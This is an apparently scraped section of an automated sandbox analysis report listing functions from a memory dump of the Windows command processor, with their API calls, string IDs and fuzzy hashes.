                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: GeToken: (%x) '%s'$Ungetting: '%s'
                                                                                        • API String ID: 0-1704545398
                                                                                        • Opcode ID: 0400ac4ddfee2876520601e3ee381338dd0483dfb3854288bfa3ed41e444e281
                                                                                        • Instruction ID: 2aa83b7efe52d2b8c27b4a8ea7df63cec4f9f090a46c1de346e2df68f12ab71e
                                                                                        • Opcode Fuzzy Hash: 0400ac4ddfee2876520601e3ee381338dd0483dfb3854288bfa3ed41e444e281
                                                                                        • Instruction Fuzzy Hash: FE513631B202018BD724BB68D81577A7672EB95358F19513AE4CAC7392FBB2DC44CBB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D84DBD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 145COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: iswdigit$wcstol
                                                                                        • String ID: aApP
                                                                                        • API String ID: 644763121-2547155087
                                                                                        • Opcode ID: 940a4e4244e8ea16835abc1efc21ed4288a85ef856c8ad4f24b08d9a9de56359
                                                                                        • Instruction ID: ad4011e0d2434e1e4efac67e2d10637f112b1225ada795532f12e1966b967425
                                                                                        • Opcode Fuzzy Hash: 940a4e4244e8ea16835abc1efc21ed4288a85ef856c8ad4f24b08d9a9de56359
                                                                                        • Instruction Fuzzy Hash: 7041C075A0022786CF24FF69C89167BB3A5FF95700B19442AF946EB280FA34DD42C7B1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D857A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00D857F8
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00D85886
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnumErrorLast
                                                                                        • String ID: %s=%s$.
                                                                                        • API String ID: 1967352920-4275322459
                                                                                        • Opcode ID: f5926d5729f0280fef9ef20922217f87be057a77cbb720609e7e29c32961d7ae
                                                                                        • Instruction ID: a051df9a24fb687d6b01f3c08225ae1f74285755a6f93f739d40519082ec30bb
                                                                                        • Opcode Fuzzy Hash: f5926d5729f0280fef9ef20922217f87be057a77cbb720609e7e29c32961d7ae
                                                                                        • Instruction Fuzzy Hash: CD415B35E4061997CF34BB29AC95ABF7379EF84310F1941AEE80A97245DA708E41CFB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D8A759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D8A79F
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • GetDiskFreeSpaceExW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,-00000105,?,?,?), ref: 00D8A83C
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D8A8B5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$DiskFreeSpace
                                                                                        • String ID: %5lu
                                                                                        • API String ID: 2448137811-2100233843
                                                                                        • Opcode ID: 199fbc4308bd47dfedde24ad50788654aa74d7589e9223bac5a2753d8099412c
                                                                                        • Instruction ID: 23217cbd1579b7223a3ee9f0befbb9c88a54c4e3c150f5ed45ad90248006a24d
                                                                                        • Opcode Fuzzy Hash: 199fbc4308bd47dfedde24ad50788654aa74d7589e9223bac5a2753d8099412c
                                                                                        • Instruction Fuzzy Hash: DC414671A00219ABDB24EBA4DC95BAEB7B8FF08304F0444ADE509E7241E7749E85CB71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D8378A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 111COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0(001F0003,00000000,?), ref: 00D83835
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D83847
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastOpenSemaphore
                                                                                        • String ID: _p0$wil
                                                                                        • API String ID: 1909229842-1814513734
                                                                                        • Opcode ID: 45e2df602c3a1fe3c6027078970ccc22cdd270d6a0f92b14e0ca39dd80b63f3b
                                                                                        • Instruction ID: 0112b0bce016c15b85dcb0246489df72eb747407e238a560596d60a7a26ff032
                                                                                        • Opcode Fuzzy Hash: 45e2df602c3a1fe3c6027078970ccc22cdd270d6a0f92b14e0ca39dd80b63f3b
                                                                                        • Instruction Fuzzy Hash: 6F41A7B1E012298BCB25EF28C8555A977B5EF94B00F198299E809D7354DB70DF458BB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D8237E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 110synchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000040), ref: 00D8239F
                                                                                        • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,?,00000000,001F0001), ref: 00D823CD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateCurrentMutexProcess
                                                                                        • String ID: Local\SM0:%d:%d:%hs$wil
                                                                                        • API String ID: 3937467467-2303653343
                                                                                        • Opcode ID: 9009b0bbdd749d4120b1452231c9b0c549e5d9184a0e6292309cd875b30ea237
                                                                                        • Instruction ID: 9b729e0644d645aa790c84f40451c0a83db762a1a4e4d6d09d632381b7040211
                                                                                        • Opcode Fuzzy Hash: 9009b0bbdd749d4120b1452231c9b0c549e5d9184a0e6292309cd875b30ea237
                                                                                        • Instruction Fuzzy Hash: AA41B6B5A402289BCB21FB58DC89EFAB7B5EF94710F144185E809A7341EB709F458FB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D8B222 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$_wcslwr
                                                                                        • String ID: [%s]
                                                                                        • API String ID: 886762496-302437576
                                                                                        • Opcode ID: 73c7d33026a6a4c17eefe7e8639cf5fe0a1a6b8b6031b60a9e83c2e97df2a32d
                                                                                        • Instruction ID: f56f9747dc15743416f3ee435c875c60013b64fefb1a6bcc9fe4292c94afae04
                                                                                        • Opcode Fuzzy Hash: 73c7d33026a6a4c17eefe7e8639cf5fe0a1a6b8b6031b60a9e83c2e97df2a32d
                                                                                        • Instruction Fuzzy Hash: BB316471A012199BDB14EBE9DCC5BAEBBB8EF59350F08006AE505E7241EB74DE448B70
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D74BAF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsnicmp
                                                                                        • String ID: /-Y$COPYCMD
                                                                                        • API String ID: 1886669725-617350906
                                                                                        • Opcode ID: e8f28d77284f89d51339803c546788f963fc879967416a919de102a54ee8f669
                                                                                        • Instruction ID: f50dd4d691ba27ea9e3e727cf8c5c3fac4cba3ca5834af5676447338eb9063d6
                                                                                        • Opcode Fuzzy Hash: e8f28d77284f89d51339803c546788f963fc879967416a919de102a54ee8f669
                                                                                        • Instruction Fuzzy Hash: 51218B71A00211ABCB299B1D9C557BBBAF9EF89354B598069F88DE7240FBB0CD01C370
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D69E09 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00D69E8E: iswspace.MSVCRT ref: 00D69E9E
                                                                                        • iswspace.MSVCRT ref: 00D69E28
                                                                                        • _wcsnicmp.MSVCRT ref: 00D69E79
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: iswspace$_wcsnicmp
                                                                                        • String ID: off
                                                                                        • API String ID: 3989682491-733764931
                                                                                        • Opcode ID: e8eb052b3d96fb6d60f7a59411123d9ec875d612bbdabfd7c799a5caa95655dd
                                                                                        • Instruction ID: 485ddb09156f4d5fab8694e0392a2e80ff1b3b3052fe92b213a2e24186ab1cb2
                                                                                        • Opcode Fuzzy Hash: e8eb052b3d96fb6d60f7a59411123d9ec875d612bbdabfd7c799a5caa95655dd
                                                                                        • Instruction Fuzzy Hash: C31108316063119BDB24A2A85C3AB3AD25C8B85F65F2C002DFD5AD61C3EA73CD40D1B1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D85166 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00D7727B: __iob_func.MSVCRT ref: 00D77280
                                                                                        • fprintf.MSVCRT ref: 00D85182
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: __iob_funcfprintf
                                                                                        • String ID: CMD Internal Error %s$%s$Null environment
                                                                                        • API String ID: 620453056-2781220306
                                                                                        • Opcode ID: 9c8874f3ac81bf3bd78fa884aea88f9bdf7834fb88204aaa324ada0d75de5438
                                                                                        • Instruction ID: 7133df215b27e296371767a89074abf9f276170be22e44c3cfc770107e9ab4a1
                                                                                        • Opcode Fuzzy Hash: 9c8874f3ac81bf3bd78fa884aea88f9bdf7834fb88204aaa324ada0d75de5438
                                                                                        • Instruction Fuzzy Hash: D2017B37A04B129FC7343B5CB80AA73B354DBD1324359052BEC9A93148F6A19D068774
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D83500 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll.dll), ref: 00D8351B
                                                                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RtlDllShutdownInProgress), ref: 00D8352C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: RtlDllShutdownInProgress$ntdll.dll
                                                                                        • API String ID: 1646373207-582119455
                                                                                        • Opcode ID: 24991827c8dd56f51b503292b0f81cd6555b99d21ef8893e334b5cb11e948e85
                                                                                        • Instruction ID: f39fd8489c6572ae8e888ee86b723bc28ee49def4f2ea397c44af97e27f65484
                                                                                        • Opcode Fuzzy Hash: 24991827c8dd56f51b503292b0f81cd6555b99d21ef8893e334b5cb11e948e85
                                                                                        • Instruction Fuzzy Hash: EEE01A71A41330AB8B21AF3CBD1999A7B98EA46FA13060295F80DD3360D764CD018FF1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D838F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernelbase.dll), ref: 00D838FB
                                                                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RaiseFailFastException), ref: 00D83907
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: RaiseFailFastException$kernelbase.dll
                                                                                        • API String ID: 1646373207-919018592
                                                                                        • Opcode ID: c72a2ca67913605b1fdc5eeb369d6f97e7f13c18a41cf092a5d12b826140913f
                                                                                        • Instruction ID: bf0877547ce5d942560de7f06e89e2c8173974afe9ddc22b104e7766f1fc52aa
                                                                                        • Opcode Fuzzy Hash: c72a2ca67913605b1fdc5eeb369d6f97e7f13c18a41cf092a5d12b826140913f
                                                                                        • Instruction Fuzzy Hash: 40E0EC72640729BB8B212FA5DC0DC9ABF19EB55BA17054121F919D2260CBB68910DFB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D752F5 Relevance: 6.2, APIs: 4, Instructions: 185COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D7539E
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D754C6
                                                                                          • Part of subcall function 00D68E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00DA8BF0,00000000,?), ref: 00D68EC3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$CurrentDirectory
                                                                                        • String ID:
                                                                                        • API String ID: 168429351-0
                                                                                        • Opcode ID: 0b97f4b6d8b388f8fb4729a0050a7f85ea694987f0ec418edc242dfebdeb070d
                                                                                        • Instruction ID: f2b0e33aa762a228a5337761d05bfc1953d813366361b6c362f26eb8357bf77e
                                                                                        • Opcode Fuzzy Hash: 0b97f4b6d8b388f8fb4729a0050a7f85ea694987f0ec418edc242dfebdeb070d
                                                                                        • Instruction Fuzzy Hash: EF614671A087419FD728DF28E88566BB7E5FB88304F18892EF589C7250EB70D845CB67
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6AA75 Relevance: 6.2, APIs: 4, Instructions: 182COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsnicmp$wcschr
                                                                                        • String ID:
                                                                                        • API String ID: 3270668897-0
                                                                                        • Opcode ID: 32004b5c9d336a58c4c6a831924172854fb5e0e968b7607ed2840ffd9c76da49
                                                                                        • Instruction ID: dfe1f5a0f8c302eb3d4702873f0aba2192227595fdf16215bc323c724aff7e79
                                                                                        • Opcode Fuzzy Hash: 32004b5c9d336a58c4c6a831924172854fb5e0e968b7607ed2840ffd9c76da49
                                                                                        • Instruction Fuzzy Hash: AE514C356002159FCB24EBACD815A7E73A5EF84701B5C801EE886E72C1FBB08E42D7B1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6DED0 Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: iswdigit
                                                                                        • String ID:
                                                                                        • API String ID: 3849470556-0
                                                                                        • Opcode ID: ab77561d1c3ca72e30015162f5b76ddf353f52415cb72b7151950a0420a496c0
                                                                                        • Instruction ID: dbb3715dbfa9b300980cb2ea3973dc736d63a7f50c5a4b944beb57543c54dada
                                                                                        • Opcode Fuzzy Hash: ab77561d1c3ca72e30015162f5b76ddf353f52415cb72b7151950a0420a496c0
                                                                                        • Instruction Fuzzy Hash: 8551D074E042049BCB14DF59E84527AB7B2FF85300F2981AAE846C7391EBB5DD41DBB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D71CD5 Relevance: 6.1, APIs: 4, Instructions: 118COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,00D680F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00D71D3A
                                                                                        • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00D680F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00D71D44
                                                                                        • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,00D680F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00D71D57
                                                                                        • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00D680F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00D71D61
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$FullNamePath
                                                                                        • String ID:
                                                                                        • API String ID: 268959451-0
                                                                                        • Opcode ID: bda37be6e671ed9bb02e67920f4cb63169335ef7883ca6293820e1193199e6e3
                                                                                        • Instruction ID: 4bc2c4e8ca85853cf4af0921cf1595fb326e0f57f8952234e82bed841bf84615
                                                                                        • Opcode Fuzzy Hash: bda37be6e671ed9bb02e67920f4cb63169335ef7883ca6293820e1193199e6e3
                                                                                        • Instruction Fuzzy Hash: 9D31E539100201ABCB389B6CC855A7BB7A5EF88704768CA2DE94AC7754F7B1AA41C770
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6C570 Relevance: 6.1, APIs: 4, Instructions: 101memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00D6C5BD
                                                                                        • RtlFreeHeap.NTDLL(00000000), ref: 00D6C5C4
                                                                                        • _setjmp3.MSVCRT ref: 00D6C630
                                                                                        • VirtualFree.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,00008000,00000000,00000000,00000000,00000000,00000000), ref: 00D6C69D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeHeap$ProcessVirtual_setjmp3
                                                                                        • String ID:
                                                                                        • API String ID: 2613391085-0
                                                                                        • Opcode ID: befe37dd56ce647145025f50cd7443cecb37372d2d6583bd08d5dc49241fdcab
                                                                                        • Instruction ID: 94ab0b0d6f8e0d829f1ef9c6d157a79ab84c47ad4f9ad5c63309ef722fadca88
                                                                                        • Opcode Fuzzy Hash: befe37dd56ce647145025f50cd7443cecb37372d2d6583bd08d5dc49241fdcab
                                                                                        • Instruction Fuzzy Hash: B3316A70B103009BDB50EFA8DC4472977B4FB45704F15952AE88AD7360E7B5D844CBB5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D863F3 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
